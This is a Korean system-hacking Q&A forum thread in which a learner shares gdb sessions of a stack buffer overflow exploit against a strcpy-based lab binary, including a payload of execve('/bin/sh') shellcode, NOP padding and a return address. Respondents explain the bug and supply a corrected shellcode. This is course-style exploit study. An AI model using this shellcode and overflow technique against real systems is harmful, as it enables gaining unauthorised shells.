Cannot access memory at address

return address에 쉘코드로 가는 주소를 적었는데 Cannot access memory at address 0x90909094가 떴습니다.
뭐가 잘못된 걸까요?
(수정) 이제는 Cannot access memory at address 0x90909094는 안 뜨는데, 쉘코드가 동작하지 않네요ㅠㅠ
(gdb) disas main
Dump of assembler code for function main:
0x08048484 <+0>: push ebp
0x08048485 <+1>: mov ebp,esp
0x08048487 <+3>: sub esp,0x4
0x0804848a <+6>: cmp DWORD PTR [ebp+0x8],0x1
0x0804848e <+10>: jg 0x804849c <main+24>
0x08048490 <+12>: mov DWORD PTR [esp],0xffffffff
0x08048497 <+19>: call 0x8048310 <exit@plt>
0x0804849c <+24>: mov eax,DWORD PTR [ebp+0xc]
0x0804849f <+27>: add eax,0x4
0x080484a2 <+30>: mov eax,DWORD PTR [eax]
0x080484a4 <+32>: mov DWORD PTR [esp],eax
0x080484a7 <+35>: call 0x804843d <vuln>
0x080484ac <+40>: mov eax,0x0
0x080484b1 <+45>: leave
0x080484b2 <+46>: ret
End of assembler dump.
(gdb) b*0x804843d
Breakpoint 1 at 0x804843d
(gdb) r $(python -c 'print"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xd2\xb0\x0b\xcd\x80"+"\x90"*19+"\x98\xd5\xff\xff";')
Starting program: /home/reversing/./example1 $(python -c 'print"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xd2\xb0\x0b\xcd\x80"+"\x90"*19+"\x98\xd5\xff\xff";')

Breakpoint 1, 0x0804843d in vuln ()
Missing separate debuginfos, use: debuginfo-install glibc-2.17-324.el7_9.i686
(gdb) disas vuln
Dump of assembler code for function vuln:
=> 0x0804843d <+0>: push ebp
0x0804843e <+1>: mov ebp,esp
0x08048440 <+3>: push ebx
0x08048441 <+4>: sub esp,0x28
0x08048444 <+7>: lea edx,[ebp-0x24]
0x08048447 <+10>: mov ecx,0x0
0x0804844c <+15>: mov eax,0x20
0x08048451 <+20>: and eax,0xfffffffc
0x08048454 <+23>: mov ebx,eax
0x08048456 <+25>: mov eax,0x0
0x0804845b <+30>: mov DWORD PTR [edx+eax*1],ecx
0x0804845e <+33>: add eax,0x4
0x08048461 <+36>: cmp eax,ebx
0x08048463 <+38>: jb 0x804845b <vuln+30>
0x08048465 <+40>: add edx,eax
0x08048467 <+42>: mov eax,DWORD PTR [ebp+0x8]
0x0804846a <+45>: mov DWORD PTR [esp+0x4],eax
0x0804846e <+49>: lea eax,[ebp-0x24]
0x08048471 <+52>: mov DWORD PTR [esp],eax
0x08048474 <+55>: call 0x8048300 <strcpy@plt>
0x08048479 <+60>: mov eax,0x0
0x0804847e <+65>: add esp,0x28
---Type <return> to continue, or q <return> to quit---
0x08048481 <+68>: pop ebx
0x08048482 <+69>: pop ebp
0x08048483 <+70>: ret
End of assembler dump.
(gdb) b *0x08048474
Breakpoint 2 at 0x8048474
(gdb) c
Continuing.

Breakpoint 2, 0x08048474 in vuln ()
(gdb) x/16wx $esp
0xffffd590: 0xffffd598 0xffffd7bf 0x00000000 0x00000000
0xffffd5a0: 0x00000000 0x00000000 0x00000000 0x00000000
0xffffd5b0: 0x00000000 0x00000000 0xf7fbe000 0xffffd5c8
0xffffd5c0: 0x080484ac 0xffffd7bf 0x00000000 0xf7e112d3
(gdb) ni
0x08048479 in vuln ()
(gdb) x/16wx $esp
0xffffd590: 0xffffd598 0xffffd7bf 0x6850c031 0x68732f2f
0xffffd5a0: 0x69622f68 0x31e3896e 0xcd0bb0d2 0x90909080
0xffffd5b0: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd5c0: 0xffffd598 0xffffd700 0x00000000 0xf7e112d3
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xffffd5b9 in ?? ()
(gdb)

#시스템해킹
답변 2
juno2
답변 등록: 25

return address 자리에 쉘코드의 주소가 아니라 쉘코드의 앞부분(바이트 값 자체)을 적은 것으로 보입니다.

2021.08.22. 09:30
xl4sh
강의 수강: 10

사용하신 쉘코드는 직접 만드신 건가요?
쉘코드에 ecx 레지스터(execve의 두 번째 인자인 argv)에 값을 세팅해 주는 부분이 없어서 문제가 발생했을 가능성이 있습니다.

사용하신 쉘코드 - "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xd2\xb0\x0b\xcd\x80"

0:  31 c0                   xor    eax,eax
2:  50                      push   eax
3:  68 2f 2f 73 68          push   0x68732f2f
8:  68 2f 62 69 6e          push   0x6e69622f
d:  89 e3                   mov    ebx,esp
f:  31 d2                   xor    edx,edx
11: b0 0b                   mov    al,0xb
13: cd 80                   int    0x80

위 디스어셈블리에서 보이듯이 ecx 레지스터에 값을 세팅하는 명령이 없습니다.

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"

해당 강좌에서 제공해 준 위의 쉘코드(사용하신 쉘코드에 `\x31\xc9`, 즉 xor ecx,ecx가 추가된 형태)나 다른 쉘코드를 사용하시는 것을 추천드립니다.

2021.08.22. 16:18